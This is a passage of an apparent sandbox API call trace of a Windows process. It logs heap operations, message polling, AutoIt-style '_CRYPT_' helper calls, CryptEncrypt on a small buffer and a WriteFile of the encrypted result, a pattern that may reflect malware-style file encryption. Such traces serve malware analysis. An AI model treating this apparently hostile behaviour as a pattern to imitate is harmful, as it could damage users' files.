Flags=0x0, Size=0x8) returned 0x2e54cb8 [0188.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1267) returned 0x2f24018 [0188.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5e020 | out: hHeap=0x970000) returned 1 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0188.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1267) returned 0x2f25288 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0188.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0188.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1267) returned 0x2f24018 [0188.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0188.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0188.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.268] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0188.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0188.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.270] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.270] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.270] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.270] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0188.270] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.270] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.270] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0188.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0188.271] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0188.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.271] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0188.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0188.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50bf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0188.272] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1267, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x1268) returned 1 [0188.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.273] CharLowerBuffW (in: lpsz="byte[4712]", cchLength=0xa | out: lpsz="byte[4712]") returned 0xa [0188.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.273] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.273] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0188.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0188.274] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27768*, pdwDataLen=0x8cef60*=0x1267, dwBufLen=0x1268 | out: pbData=0x2f27768*, pdwDataLen=0x8cef60*=0x1268) returned 1 [0188.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.274] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.274] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.274] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0188.274] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0188.275] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.275] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.275] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0188.364] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.364] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.366] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f25288*, nNumberOfBytesToWrite=0x1268, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f25288*, lpNumberOfBytesWritten=0x8cf5e4*=0x1268, lpOverlapped=0x0) returned 1 [0188.367] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0188.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0188.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0188.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0188.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0188.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0188.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0188.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0188.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0188.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.369] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0188.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0188.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0188.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0188.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0188.369] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0188.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.370] 